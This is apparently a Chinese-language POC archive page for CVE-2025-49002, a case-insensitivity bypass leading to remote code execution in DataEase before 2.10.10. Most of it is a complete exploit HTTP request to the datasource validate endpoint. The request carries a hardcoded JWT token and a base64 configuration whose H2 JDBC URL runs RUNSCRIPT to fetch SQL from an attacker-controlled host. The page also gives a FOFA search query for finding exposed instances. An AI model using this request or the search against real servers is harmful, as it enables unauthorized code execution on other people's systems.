关联漏洞
标题:
DataEase 安全漏洞
(CVE-2025-49002)
描述:DataEase是DataEase开源的一个开源的数据可视化分析工具。用于帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。 DataEase 2.10.10之前版本存在安全漏洞,该漏洞源于INIT和RUNSCRIPT禁止但可通过大小写不敏感绕过补丁。
描述
飞致云 DataEase Postgresql JDBC Bypass 远程代码执行漏洞 CVE-2025-49002 漏洞类型 RCE
介绍
fofa语法:title="DataEase"
poc:
"POST /de2api/datasource/validate HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua: ""Google Chrome"";v=""135"", ""Not-A.Brand"";v=""8"", ""Chromium"";v=""135""
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
Accept-Language: zh-CN
Sec-Fetch-Dest: empty
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
sec-ch-ua-platform: ""Windows""
Content-Type: application/json
Sec-Fetch-Mode: cors
Content-Length: 821
{
""id"": """",
""name"": ""11"",
""description"": """",
""type"": ""h2"",
""apiConfiguration"": [],
""paramsConfiguration"": [],
""enableDataFill"": false,
""configuration"": ""eyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0ZGI7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO2luaXQ9UlVuU0NSSVBUIEZST00gJ2h0dHA6Ly95b3VyLXZwczoyMzMzL3BvYy5zcWwnIiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwicGFzc3dvcmQiOiIxMjMiLCJob3N0IjoiIiwiYXV0aE1ldGhvZCI6IiIsInBvcnQiOjAsImluaXRpYWxQb29sU2l6ZSI6NSwibWluUG9vbFNpemUiOjUsIm1heFBvb2xTaXplIjo1LCJxdWVyeVRpbWVvdXQiOjMwfQ==""
}"
文件快照
[4.0K] /data/pocs/59c1bcf83c9e622f562a99b9d8aafff67f54933e
├── [3.3K] poc.py
└── [1.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。